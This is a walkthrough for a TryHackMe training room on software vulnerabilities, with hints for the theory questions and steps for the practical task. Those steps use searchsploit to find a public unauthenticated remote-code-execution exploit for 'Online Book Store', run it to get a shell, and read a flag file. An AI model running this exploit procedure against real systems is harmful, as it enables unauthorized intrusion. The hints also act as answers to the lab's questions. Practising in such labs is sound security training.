The Exploit Vulnerabilities/CMNatic Bookstore is the second room in a series of three done by cmnatic (https://tryhackme.com/p/cmnatic) to teach people about software vulnerabilities. The first four tasks are theory questions but the last task does involve doing some manual exploitation of a vulnerable machine.
The room is available at https://tryhackme.com/room/exploitingavulnerabilityv2
Question 1: Start the machine
Question 2: Would you use an automated scanner? (Yay/Nay)
Question 2 Answer: Hint – Which is faster
Question 3: What vulnerability is this?
Question 3 Answer: Hint – You would need to input harmful code.
Question 4: You manage to impersonate another user. What vulnerability is this?
Question 4 Answer: Hint – Look at the table of different vulnerabilities.
Question 5: What website would you use as a security researcher if you wanted to upload a Proof of Concept?
Question 5 Answer: Hint – Very popular code hosting site owned by Microsoft
Question 6: You are performing a penetration test at a site with no internet connection. What tool could you use to find exploits to use?
Question 6 Answer: Hint – offline tool installed on Kali Linux
Question 7: What type of vulnerability was used in this attack?
Question 7 Answer: – Hint – Acronym is RCE
Question 8: Find out the version of the application that is running. What are the name and version number of the application?
Question 8 Answer: Hint – Look at the bottom Right Hand Side of the Page
Question 9: Use this exploit against the vulnerable machine. What is the value of the flag located in a web directory?
This is where the theory stops and the practical begins
Run the following command:
searchsploit Online Book Store
Or you can use Exploit Database (https://www.exploit-db.com) and search for Online Book Store. There are several options but the Unauthenticated Remote Code Execution exploit is the best option.
Download/copy the python file to your home directory. Then run the following command:
python3 47887.py http://x.x.x.x/
Obviously change x.x.x.x to the IP address of the machine.
Answer y when the script asks if: Do you wish to launch a shell here?
The exploit will launch a shell which looks like this: RCE
Change directory to /var/www/html/bootstrap/img
Then just look for the flag.txt and view it – Paste the contents into the last question and you are done